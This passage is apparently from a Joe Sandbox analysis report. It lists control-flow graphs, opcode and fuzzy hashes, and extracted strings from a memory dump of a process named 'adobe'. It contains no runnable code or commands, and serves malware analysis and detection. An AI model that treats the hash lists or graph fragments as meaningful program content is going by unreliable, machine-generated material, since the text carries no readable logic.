                                                        • API String ID: 0-2246304398
                                                        • Opcode ID: bd96d9560c2d3c092213d5dc8ae0e44cc665dffd2fd9064db8a3fb7ff6781000
                                                        • Instruction ID: e4087dd8c8e903d52c67173c8f24c9d2e44a29fbf3d9e9e7f04dbb2f0e1ff71e
                                                        • Opcode Fuzzy Hash: bd96d9560c2d3c092213d5dc8ae0e44cc665dffd2fd9064db8a3fb7ff6781000
                                                        • Instruction Fuzzy Hash: 4F029E35B102058FDB54DB69D9507AEB7F2EF84300F148569E505DB3A9EB71ED82CB80

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1160 66f55e8-66f5605 1161 66f5607-66f560a 1160->1161 1162 66f560c-66f560d 1161->1162 1163 66f5612-66f5615 1161->1163 1162->1163 1164 66f5617-66f561e 1163->1164 1165 66f5623-66f5626 1163->1165 1164->1165 1166 66f5628-66f562e 1165->1166 1167 66f5635-66f5638 1165->1167 1168 66f563a-66f563d 1166->1168 1169 66f5630 1166->1169 1167->1168 1170 66f5642-66f5645 1167->1170 1168->1170 1169->1167 1171 66f565e-66f5661 1170->1171 1172 66f5647-66f5659 1170->1172 1173 66f5687-66f568a 1171->1173 1174 66f5663-66f5682 1171->1174 1172->1171 1175 66f568c-66f568f 1173->1175 1176 66f5694-66f5697 1173->1176 1174->1173 1175->1176 1178 66f569d-66f56a0 1176->1178 1179 66f5721-66f5727 1176->1179 1181 66f56b3-66f56b6 1178->1181 1182 66f56a2-66f56a8 1178->1182 1183 66f5729 1179->1183 1184 66f5733-66f5739 1179->1184 1181->1182 1187 66f56b8-66f56bb 1181->1187 1185 66f56ae 1182->1185 1186 66f5762-66f576c 1182->1186 1188 66f572e-66f5731 1183->1188 1189 66f573b-66f5743 1184->1189 1190 66f57b3-66f57e3 1184->1190 1185->1181 1196 66f5773-66f5775 1186->1196 1192 66f56cf-66f56d2 1187->1192 1193 66f56bd-66f56ca 1187->1193 1188->1184 1194 66f575d-66f5760 1188->1194 1189->1190 1195 66f5745-66f5752 1189->1195 1207 66f57ed-66f57f0 1190->1207 1197 66f56d4-66f56d8 1192->1197 1198 66f56e3-66f56e6 1192->1198 1193->1192 1194->1186 1201 66f577a-66f577d 1194->1201 1195->1190 1200 66f5754-66f5758 1195->1200 1196->1201 1205 66f56de 1197->1205 1206 66f57a5-66f57b2 1197->1206 1208 66f56e8-66f56fe 1198->1208 1209 66f5703-66f5706 1198->1209 1200->1194 1202 66f577f-66f5788 1201->1202 1203 66f5789-66f578c 1201->1203 1214 66f578e-66f5790 1203->1214 1215 66f5793-66f5795 1203->1215 1205->1198 1210 66f57fa-66f57fd 1207->1210 1211 66f57f2-66f57f9 1207->1211 1208->1209 1212 66f571c-66f571f 1209->1212 1213 66f5708-66f5717 1209->1213 1217 66f57ff-66f5806 1210->1217 1218 66f5811-66f5814 1210->1218 1212->1179 1212->1188 1213->1212 1214->1215 1219 66f579c-66f579f 1215->1219 1220 66f5797 1215->1220 1221 66f58ce-66f58d5 1217->1221 1222 66f580c 1217->1222 1223 66f5836-66f5839 1218->1223 1224 66f5816-66f581a 1218->1224 1219->1161 1219->1206 1220->1219 1222->1218 1228 66f583b-66f584c 1223->1228 1229 66f5851-66f5854 1223->1229 1226 66f58d6-66f58e8 1224->1226 1227 66f5820-66f5828 1224->1227 1238 66f58ea-66f5914 1226->1238 1239 66f5918-66f5919 1226->1239 1227->1226 1230 66f582e-66f5831 1227->1230 1228->1229 1231 66f586e-66f5871 1229->1231 1232 66f5856-66f585a 1229->1232 1230->1223 1233 66f5873-66f587d 1231->1233 1234 66f5882-66f5885 1231->1234 1232->1226 1237 66f585c-66f5864 1232->1237 1233->1234 1240 66f589f-66f58a2 1234->1240 1241 66f5887-66f588b 1234->1241 1237->1226 1242 66f5866-66f5869 1237->1242 1244 66f5916 1238->1244 1245 66f591b-66f5922 1239->1245 1246 66f5927-66f592a 1239->1246 1248 66f58bc-66f58be 1240->1248 1249 66f58a4-66f58a8 1240->1249 1241->1226 1247 66f588d-66f5895 1241->1247 1242->1231 1244->1239 1245->1246 1251 66f592c-66f5931 1246->1251 1252 66f5934-66f5937 1246->1252 1247->1226 1250 66f5897-66f589a 1247->1250 1254 66f58c5-66f58c8 1248->1254 1255 66f58c0 1248->1255 1249->1226 1253 66f58aa-66f58b2 1249->1253 1250->1240 1251->1252 1256 66f5939-66f5940 1252->1256 1257 66f5945-66f5948 1252->1257 1253->1226 1258 66f58b4-66f58b7 1253->1258 1254->1207 1254->1221 1255->1254 1256->1257 1259 66f594e-66f5951 1257->1259 1260 66f59cd-66f5b61 1257->1260 1258->1248 1261 66f596b-66f596e 1259->1261 1262 66f5953-66f5964 1259->1262 1311 66f5c97-66f5caa 1260->1311 1312 66f5b67-66f5b6e 1260->1312 1264 66f5988-66f598b 1261->1264 1265 66f5970-66f5981 1261->1265 1266 66f598d-66f599e 1262->1266 1273 66f5966 1262->1273 1264->1266 1267 66f59a9-66f59ac 1264->1267 1271 66f59ae-66f59c1 1265->1271 1274 66f5983 1265->1274 1266->1245 1278 66f59a4 1266->1278 1267->1271 1272 66f59c4-66f59c7 1267->1272 1272->1260 1276 66f5cad-66f5cb0 1272->1276 1273->1261 1274->1264 1279 66f5cce-66f5cd1 1276->1279 1280 66f5cb2-66f5cc3 1276->1280 1278->1267 1282 66f5cef-66f5cf2 1279->1282 1283 66f5cd3-66f5ce4 1279->1283 1280->1245 1290 66f5cc9 1280->1290 1282->1260 1284 66f5cf8-66f5cfa 1282->1284 1283->1245 1291 66f5cea 1283->1291 1288 66f5cfc 1284->1288 1289 66f5d01-66f5d04 1284->1289 1288->1289 1289->1244 1292 66f5d0a-66f5d13 1289->1292 1290->1279 1291->1282 1313 66f5b74-66f5b97 1312->1313 1314 66f5c22-66f5c29 1312->1314 1323 66f5b9f-66f5ba7 1313->1323 1314->1311 1315 66f5c2b-66f5c5e 1314->1315 1327 66f5c63-66f5c90 1315->1327 1328 66f5c60 1315->1328 1324 66f5bac-66f5bed 1323->1324 1325 66f5ba9 1323->1325 1336 66f5bef-66f5c00 1324->1336 1337 66f5c05-66f5c16 1324->1337 1325->1324 1327->1292 1328->1327 1336->1292 1337->1292
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $
                                                        • API String ID: 0-3993045852
                                                        • Opcode ID: 17c6d48d12107eaad472695a5d5c527df96310e94c661a7f995bed6ecb9f32d1
                                                        • Instruction ID: f58b1329ee5789787da89fb1e00d8117378b40485074557cd00f8531e2108829
                                                        • Opcode Fuzzy Hash: 17c6d48d12107eaad472695a5d5c527df96310e94c661a7f995bed6ecb9f32d1
                                                        • Instruction Fuzzy Hash: ED22E375E102159FDF64DBA4C5806AEBBB2FF85320F20846AE616EB354DB35EC41CB90
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d74ee7e2257a0bbafe3b0ca0ed4c44a2adbac9cef06f4521075aa32403642867
                                                        • Instruction ID: 7118fdf2b45e02011d909c8187d5d1444d9d179b784d90e9f1f110fb6464228f
                                                        • Opcode Fuzzy Hash: d74ee7e2257a0bbafe3b0ca0ed4c44a2adbac9cef06f4521075aa32403642867
                                                        • Instruction Fuzzy Hash: 1462BD34B202058FDB54DB68D594BADBBF2EF88310F248469E506EB395DB35EC42CB90
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a608657681bd42b0f9356cc89886adf7d00b8ef986370f3efc065d8ee9ccc878
                                                        • Instruction ID: ba54354ddf298f928d3f1d92336940d52ff42fded86be4c9b439b5391ada9a1d
                                                        • Opcode Fuzzy Hash: a608657681bd42b0f9356cc89886adf7d00b8ef986370f3efc065d8ee9ccc878
                                                        • Instruction Fuzzy Hash: 17329E34F102098FDB54DB69D980BAEB7B2FB88310F108529E606EB395DB35EC45CB91
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 58e1f4e194c2b5af926e7b236e8cf2220d076c58fb5e415a0c2a23ff37c7fa4c
                                                        • Instruction ID: 04ca1c8a434fa25622edde7fed39619af318b6466065fe83ccbc9ee2b7f65a2b
                                                        • Opcode Fuzzy Hash: 58e1f4e194c2b5af926e7b236e8cf2220d076c58fb5e415a0c2a23ff37c7fa4c
                                                        • Instruction Fuzzy Hash: 81229174F202098BDFA4DF69D5807AEB7B2EB49310F248426E505EB395DB35DC81CB91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 66fad18-66fad36 1 66fad38-66fad3b 0->1 2 66fad3d-66fad46 1->2 3 66fad55-66fad58 1->3 4 66faf4f-66faf86 2->4 5 66fad4c-66fad50 2->5 6 66fad6c-66fad6f 3->6 7 66fad5a-66fad67 3->7 14 66faf88-66faf8b 4->14 5->3 8 66fad79-66fad7c 6->8 9 66fad71-66fad78 6->9 7->6 15 66faf35-66faf3e 8->15 16 66fad82-66fad85 8->16 9->8 18 66fafae-66fafb1 14->18 19 66faf8d-66fafa9 14->19 15->2 17 66faf44-66faf4e 15->17 20 66fad87-66fad8b 16->20 21 66fad96-66fad99 16->21 23 66fafbe-66fafc1 18->23 24 66fafb3-66fafbd 18->24 19->18 20->17 22 66fad8c-66fad92 20->22 25 66fadbc-66fadbf 21->25 26 66fad9b-66fadb7 21->26 22->21 30 66fafc3 call 66fb26f 23->30 31 66fafd0-66fafd3 23->31 27 66fadd9-66faddc 25->27 28 66fadc1-66fadd4 25->28 26->25 34 66fadde-66fade7 27->34 35 66fadec-66fadee 27->35 28->27 43 66fafc9-66fafcb 30->43 32 66fb23c-66fb23f 31->32 33 66fafd9-66fb014 31->33 38 66fb241-66fb245 32->38 39 66fb250-66fb252 32->39 50 66fb01a-66fb026 33->50 51 66fb207-66fb21a 33->51 34->35 40 66fadf5-66fadf8 35->40 41 66fadf0 35->41 38->33 45 66fb24b 38->45 46 66fb259-66fb25c 39->46 47 66fb254 39->47 40->1 48 66fadfe-66fae22 40->48 41->40 43->31 45->39 46->14 52 66fb262-66fb26c 46->52 47->46 60 66fae28-66fae37 48->60 61 66faf32 48->61 56 66fb028-66fb041 50->56 57 66fb046-66fb08a 50->57 53 66fb21c 51->53 58 66fb21d 53->58 56->53 76 66fb08c-66fb09e 57->76 77 66fb0a6-66fb0e5 57->77 58->58 64 66fae4f-66fae8a call 66f65e8 60->64 65 66fae39-66fae3f 60->65 61->15 86 66fae8c-66fae92 64->86 87 66faea2-66faeb9 64->87 67 66fae43-66fae45 65->67 68 66fae41 65->68 67->64 68->64 76->77 81 66fb1cc-66fb1e1 77->81 82 66fb0eb-66fb1c6 call 66f65e8 77->82 81->51 82->81 89 66fae96-66fae98 86->89 90 66fae94 86->90 96 66faebb-66faec1 87->96 97 66faed1-66faee2 87->97 89->87 90->87 98 66faec5-66faec7 96->98 99 66faec3 96->99 102 66faefa-66faf2b 97->102 103 66faee4-66faeea 97->103 98->97 99->97 102->61 105 66faeee-66faef0 103->105 106 66faeec 103->106 105->102 106->102
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: XM$XM$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
                                                        • API String ID: 0-898559689
                                                        • Opcode ID: c474acf8f482aa78d5c1f5f81c386bce1eb4e9c3177ed109d7d6243a7f882922
                                                        • Instruction ID: ec2d2b7740b167b211c36770a8c8dc6ae81ff523d49b27767073e83c23194425
                                                        • Opcode Fuzzy Hash: c474acf8f482aa78d5c1f5f81c386bce1eb4e9c3177ed109d7d6243a7f882922
                                                        • Instruction Fuzzy Hash: A1E15F74E2020ACFDB55DBA9D5906AEB7B2FF89300F208529E509EB354DB319C46CB91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 257 66fb6a0-66fb6c0 258 66fb6c2-66fb6c5 257->258 259 66fb6ec-66fb6ef 258->259 260 66fb6c7-66fb6cb 258->260 261 66fb6fc-66fb6ff 259->261 262 66fb6f1-66fb6f7 259->262 263 66fba3f-66fba76 260->263 264 66fb6d1-66fb6e1 260->264 265 66fb73e-66fb741 261->265 266 66fb701-66fb716 261->266 262->261 272 66fba78-66fba7b 263->272 275 66fb6e7 264->275 276 66fb954-66fb958 264->276 268 66fb74b-66fb74e 265->268 269 66fb743-66fb748 265->269 266->263 278 66fb71c-66fb739 266->278 273 66fb75e-66fb761 268->273 274 66fb750-66fb759 268->274 269->268 279 66fba9e-66fbaa1 272->279 280 66fba7d-66fba99 272->280 281 66fb77e-66fb781 273->281 282 66fb763-66fb76c 273->282 274->273 275->259 276->263 277 66fb95e-66fb96e 276->277 299 66fb997-66fb99b 277->299 300 66fb970 277->300 278->265 285 66fbd0d-66fbd0f 279->285 286 66fbaa7-66fbacf 279->286 280->279 283 66fb795-66fb798 281->283 284 66fb783-66fb787 281->284 282->263 287 66fb772-66fb779 282->287 289 66fb7af-66fb7b2 283->289 290 66fb79a-66fb79e 283->290 284->263 288 66fb78d-66fb790 284->288 294 66fbd16-66fbd19 285->294 295 66fbd11 285->295 343 66fbad9-66fbb1d 286->343 344 66fbad1-66fbad4 286->344 287->281 288->283 297 66fb86d-66fb870 289->297 298 66fb7b8-66fb7bb 289->298 290->263 296 66fb7a4-66fb7aa 290->296 294->272 301 66fbd1f-66fbd28 294->301 295->294 296->289 308 66fb875-66fb878 297->308 303 66fb846-66fb84f 298->303 304 66fb7c1-66fb7c4 298->304 299->263 307 66fb9a1-66fb9b1 299->307 305 66fb975-66fb978 300->305 314 66fb855 303->314 315 66fb9c1-66fb9ca 303->315 310 66fb7e6-66fb7e9 304->310 311 66fb7c6-66fb7e1 304->311 312 66fb97a-66fb97d 305->312 313 66fb982-66fb985 305->313 307->297 327 66fb9b7 307->327 316 66fb89b-66fb89e 308->316 317 66fb87a-66fb896 308->317 324 66fb7eb-66fb7ef 310->324 325 66fb800-66fb803 310->325 311->310 312->313 321 66fb987-66fb98d 313->321 322 66fb992-66fb995 313->322 323 66fb85a-66fb85d 314->323 315->263 318 66fb9cc-66fb9d3 315->318 319 66fb8b0-66fb8b3 316->319 320 66fb8a0-66fb8ab 316->320 317->316 332 66fb9d8-66fb9db 318->332 333 66fb8b5-66fb8b9 319->333 334 66fb8c4-66fb8c7 319->334 320->319 321->322 322->299 337 66fb9bc-66fb9bf 322->337 323->297 336 66fb85f-66fb862 323->336 324->263 338 66fb7f5-66fb7fb 324->338 329 66fb805-66fb81a 325->329 330 66fb841-66fb844 325->330 327->337 329->263 357 66fb820-66fb83c 329->357 330->303 330->323 345 66fb9ed-66fb9f0 332->345 346 66fb9dd 332->346 333->274 340 66fb8bf 333->340 341 66fb91c-66fb91f 334->341 342 66fb8c9-66fb917 call 66f65e8 334->342 347 66fb9fb-66fba04 336->347 348 66fb868-66fb86b 336->348 337->315 337->332 338->325 340->334 354 66fb92f-66fb932 341->354 355 66fb921-66fb92a 341->355 342->341 376 66fbb23-66fbb2c 343->376 377 66fbd02-66fbd0c 343->377 344->301 345->297 352 66fb9f6-66fb9f9 345->352 359 66fb9e5-66fb9e8 346->359 347->282 353 66fba0a 347->353 348->297 348->308 352->347 360 66fba0f-66fba12 352->360 353->360 361 66fb934-66fb93d 354->361 362 66fb942-66fb945 354->362 355->354 357->330 359->345 366 66fba14-66fba1d 360->366 367 66fba22-66fba24 360->367 361->362 363 66fb94f-66fb952 362->363 364 66fb947-66fb94c 362->364 363->276 363->305 364->363 366->367 371 66fba2b-66fba2e 367->371 372 66fba26 367->372 371->258 373 66fba34-66fba3e 371->373 372->371 379 66fbcf8-66fbcfd 376->379 380 66fbb32-66fbb9e call 66f65e8 376->380 379->377 391 66fbc98-66fbcad 380->391 392 66fbba4-66fbba9 380->392 391->379 393 66fbbab-66fbbb1 392->393 394 66fbbc5 392->394 396 66fbbb7-66fbbb9 393->396 397 66fbbb3-66fbbb5 393->397 398 66fbbc7-66fbbcd 394->398 399 66fbbc3 396->399 397->399 400 66fbbcf-66fbbd5 398->400 401 66fbbe2-66fbbef 398->401 399->398 402 66fbbdb 400->402 403 66fbc83-66fbc92 400->403 408 66fbc07-66fbc14 401->408 409 66fbbf1-66fbbf7 401->409 402->401 404 66fbc4a-66fbc57 402->404 405 66fbc16-66fbc23 402->405 403->391 403->392 414 66fbc6f-66fbc7c 404->414 415 66fbc59-66fbc5f 404->415 417 66fbc3b-66fbc48 405->417 418 66fbc25-66fbc2b 405->418 408->403 411 66fbbfb-66fbbfd 409->411 412 66fbbf9 409->412 411->408 412->408 414->403 419 66fbc63-66fbc65 415->419 420 66fbc61 415->420 417->403 421 66fbc2f-66fbc31 418->421 422 66fbc2d 418->422 419->414 420->414 421->417 422->417
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq$$eq$$eq$$eq
                                                        • API String ID: 0-220072568
                                                        • Opcode ID: 9ea4be50e38e510632d9e0fd12f999cc95b5d3c3e0886d9c960a1366b657cab4
                                                        • Instruction ID: fb537a1989a4363831c38749a39c16e63682d72eab0fe9f64630032536c4fb3a
                                                        • Opcode Fuzzy Hash: 9ea4be50e38e510632d9e0fd12f999cc95b5d3c3e0886d9c960a1366b657cab4
                                                        • Instruction Fuzzy Hash: 71026B70E202098FDFA4DF69D5806AEB7B2FB85310F24892AE515EB355DB31DC81CB91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 425 66f9198-66f91bd 426 66f91bf-66f91c2 425->426 427 66f91c8-66f91dd 426->427 428 66f9a80-66f9a83 426->428 435 66f91df-66f91e5 427->435 436 66f91f5-66f920b 427->436 429 66f9aa9-66f9aab 428->429 430 66f9a85-66f9aa4 428->430 432 66f9aad 429->432 433 66f9ab2-66f9ab5 429->433 430->429 432->433 433->426 437 66f9abb-66f9ac5 433->437 438 66f91e9-66f91eb 435->438 439 66f91e7 435->439 442 66f9216-66f9218 436->442 438->436 439->436 443 66f921a-66f9220 442->443 444 66f9230-66f92a1 442->444 445 66f9224-66f9226 443->445 446 66f9222 443->446 455 66f92cd-66f92e9 444->455 456 66f92a3-66f92c6 444->456 445->444 446->444 461 66f92eb-66f930e 455->461 462 66f9315-66f9330 455->462 456->455 461->462 467 66f935b-66f9376 462->467 468 66f9332-66f9354 462->468 473 66f939b-66f93a9 467->473 474 66f9378-66f9394 467->474 468->467 475 66f93ab-66f93b4 473->475 476 66f93b9-66f9433 473->476 474->473 475->437 482 66f9435-66f9453 476->482 483 66f9480-66f9495 476->483 487 66f946f-66f947e 482->487 488 66f9455-66f9464 482->488 483->428 487->482 487->483 488->487
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq$$eq
                                                        • API String ID: 0-812946093
                                                        • Opcode ID: 9f0a21285411668db1f93d47a23443c54234f4a3e0ebb0f4dff3c910c07a89fc
                                                        • Instruction ID: a9afe0d9f0414c72c408ddaf416ca0e4a1cbae32c94f84c02188f32a045a5646
                                                        • Opcode Fuzzy Hash: 9f0a21285411668db1f93d47a23443c54234f4a3e0ebb0f4dff3c910c07a89fc
                                                        • Instruction Fuzzy Hash: DF913B34F1060A8BDB54EF75D9507AEB7F6AB88300F108569D509EB398EB31ED818B91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 491 66fcfa0-66fcfbb 492 66fcfbd-66fcfc0 491->492 493 66fd009-66fd00c 492->493 494 66fcfc2-66fd004 492->494 495 66fd00e-66fd050 493->495 496 66fd055-66fd058 493->496 494->493 495->496 498 66fd05a-66fd070 496->498 499 66fd075-66fd078 496->499 498->499 500 66fd07a-66fd089 499->500 501 66fd0c1-66fd0c4 499->501 507 66fd08b-66fd090 500->507 508 66fd098-66fd0a4 500->508 504 66fd10d-66fd110 501->504 505 66fd0c6-66fd108 501->505 510 66fd159-66fd15c 504->510 511 66fd112-66fd154 504->511 505->504 507->508 512 66fd9bd-66fd9d0 508->512 513 66fd0aa-66fd0bc 508->513 517 66fd48c-66fd498 510->517 518 66fd162-66fd165 510->518 511->510 530 66fd9de-66fd9f6 512->530 531 66fd9d2-66fd9dd 512->531 513->501 517->500 523 66fd49e-66fd78b 517->523 524 66fd1ae-66fd1b1 518->524 525 66fd167-66fd1a9 518->525 706 66fd9b2-66fd9bc 523->706 707 66fd791-66fd797 523->707 528 66fd1bb-66fd1be 524->528 529 66fd1b3-66fd1b8 524->529 525->524 535 66fd207-66fd20a 528->535 536 66fd1c0-66fd1cf 528->536 529->528 537 66fd9f8-66fd9fb 530->537 531->530 539 66fd20c-66fd24e 535->539 540 66fd253-66fd256 535->540 543 66fd1de-66fd1ea 536->543 544 66fd1d1-66fd1d6 536->544 545 66fd9fd call 66fdb15 537->545 546 66fda0a-66fda0d 537->546 539->540 548 66fd279-66fd27c 540->548 549 66fd258-66fd274 540->549 543->512 550 66fd1f0-66fd202 543->550 544->543 556 66fda03-66fda05 545->556 552 66fda0f-66fda2b 546->552 553 66fda30-66fda33 546->553 557 66fd27e-66fd280 548->557 558 66fd28b-66fd28e 548->558 549->548 550->535 552->553 559 66fda66-66fda68 553->559 560 66fda35-66fda61 553->560 556->546 567 66fd347-66fd350 557->567 568 66fd286 557->568 569 66fd2d7-66fd2da 558->569 570 66fd290-66fd2d2 558->570 571 66fda6f-66fda72 559->571 572 66fda6a 559->572 560->559 575 66fd35f-66fd36b 567->575 576 66fd352-66fd357 567->576 568->558 579 66fd2dc-66fd2de 569->579 580 66fd2e9-66fd2ec 569->580 570->569 571->537 577 66fda74-66fda83 571->577 572->571 586 66fd47c-66fd481 575->586 587 66fd371-66fd385 575->587 576->575 602 66fdaea-66fdaff 577->602 603 66fda85-66fdae8 call 66f65e8 577->603 589 66fd489 579->589 590 66fd2e4 579->590 591 66fd2ee-66fd330 580->591 592 66fd335-66fd337 580->592 586->589 587->589 607 66fd38b-66fd39d 587->607 589->517 590->580 591->592 594 66fd33e-66fd341 592->594 595 66fd339 592->595 594->492 594->567 595->594 613 66fdb00 602->613 603->602 618 66fd39f-66fd3a5 607->618 619 66fd3c1-66fd3c3 607->619 613->613 623 66fd3a9-66fd3b5 618->623 624 66fd3a7 618->624 630 66fd3cd-66fd3d9 619->630 627 66fd3b7-66fd3bf 623->627 624->627 627->630 637 66fd3db-66fd3e5 630->637 638 66fd3e7 630->638 639 66fd3ec-66fd3ee 637->639 638->639 639->589 642 66fd3f4-66fd410 call 66f65e8 639->642 651 66fd41f-66fd42b 642->651 652 66fd412-66fd417 642->652 651->586 654 66fd42d-66fd47a 651->654 652->651 654->589 708 66fd799-66fd79e 707->708 709 66fd7a6-66fd7af 707->709 708->709 709->512 710 66fd7b5-66fd7c8 709->710 712 66fd7ce-66fd7d4 710->712 713 66fd9a2-66fd9ac 710->713 714 66fd7d6-66fd7db 712->714 715 66fd7e3-66fd7ec 712->715 713->706 713->707 714->715 715->512 716 66fd7f2-66fd813 715->716 719 66fd815-66fd81a 716->719 720 66fd822-66fd82b 716->720 719->720 720->512 721 66fd831-66fd84e 720->721 721->713 724 66fd854-66fd85a 721->724 724->512 725 66fd860-66fd879 724->725 727 66fd87f-66fd8a6 725->727 728 66fd995-66fd99c 725->728 727->512 731 66fd8ac-66fd8b6 727->731 728->713 728->724 731->512 732 66fd8bc-66fd8d3 731->732 734 66fd8d5-66fd8e0 732->734 735 66fd8e2-66fd8fd 732->735 734->735 735->728 740 66fd903-66fd91c call 66f65e8 735->740 744 66fd91e-66fd923 740->744 745 66fd92b-66fd934 740->745 744->745 745->512 746 66fd93a-66fd98e 745->746 746->728
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq
                                                        • API String ID: 0-177832560
                                                        • Opcode ID: 151efe0ec226035aa73afccca3f201efe3f35e5db008059f6c32402efd1f6c8f
                                                        • Instruction ID: bc9301506186abd4df6e6a880d7517046e571052fc2a0b6da9e4ea463fa7fbbf
                                                        • Opcode Fuzzy Hash: 151efe0ec226035aa73afccca3f201efe3f35e5db008059f6c32402efd1f6c8f
                                                        • Instruction Fuzzy Hash: 3B625330A102068FCB55EB79D680A5EB7F2FF84304B108A68D1169F759EB75FD86CB81

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 754 66f4bb0-66f4bd4 755 66f4bd6-66f4bd9 754->755 756 66f4bdb-66f4bf5 755->756 757 66f4bfa-66f4bfd 755->757 756->757 758 66f52dc-66f52de 757->758 759 66f4c03-66f4cfb 757->759 760 66f52e5-66f52e8 758->760 761 66f52e0 758->761 777 66f4d7e-66f4d85 759->777 778 66f4d01-66f4d4e call 66f545a 759->778 760->755 763 66f52ee-66f52fb 760->763 761->760 779 66f4d8b-66f4dfb 777->779 780 66f4e09-66f4e12 777->780 791 66f4d54-66f4d70 778->791 797 66f4dfd 779->797 798 66f4e06 779->798 780->763 794 66f4d7b-66f4d7c 791->794 795 66f4d72 791->795 794->777 795->794 797->798 798->780
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: fjq$XPjq$\Ojq
                                                        • API String ID: 0-216941231
                                                        • Opcode ID: 2d2d1c9b2100d27cde28fa61af82dd18ea8316edbc0d439cda668a274120840a
                                                        • Instruction ID: ff75bb510d10c65da4ef18db7ffb62f143203d616c06c484c563dca0f50f0222
                                                        • Opcode Fuzzy Hash: 2d2d1c9b2100d27cde28fa61af82dd18ea8316edbc0d439cda668a274120840a
                                                        • Instruction Fuzzy Hash: AF617174F102089FEB549FB9D8547AEBAF6EF88300F208529E206EB395DF754D458B90

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1045 66f9188-66f91bd 1047 66f91bf-66f91c2 1045->1047 1048 66f91c8-66f91dd 1047->1048 1049 66f9a80-66f9a83 1047->1049 1056 66f91df-66f91e5 1048->1056 1057 66f91f5-66f920b 1048->1057 1050 66f9aa9-66f9aab 1049->1050 1051 66f9a85-66f9aa4 1049->1051 1053 66f9aad 1050->1053 1054 66f9ab2-66f9ab5 1050->1054 1051->1050 1053->1054 1054->1047 1058 66f9abb-66f9ac5 1054->1058 1059 66f91e9-66f91eb 1056->1059 1060 66f91e7 1056->1060 1063 66f9216-66f9218 1057->1063 1059->1057 1060->1057 1064 66f921a-66f9220 1063->1064 1065 66f9230-66f92a1 1063->1065 1066 66f9224-66f9226 1064->1066 1067 66f9222 1064->1067 1076 66f92cd-66f92e9 1065->1076 1077 66f92a3-66f92c6 1065->1077 1066->1065 1067->1065 1082 66f92eb-66f930e 1076->1082 1083 66f9315-66f9330 1076->1083 1077->1076 1082->1083 1088 66f935b-66f9376 1083->1088 1089 66f9332-66f9354 1083->1089 1094 66f939b-66f93a9 1088->1094 1095 66f9378-66f9394 1088->1095 1089->1088 1096 66f93ab-66f93b4 1094->1096 1097 66f93b9-66f9433 1094->1097 1095->1094 1096->1058 1103 66f9435-66f9453 1097->1103 1104 66f9480-66f9495 1097->1104 1108 66f946f-66f947e 1103->1108 1109 66f9455-66f9464 1103->1109 1104->1049 1108->1103 1108->1104 1109->1108
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
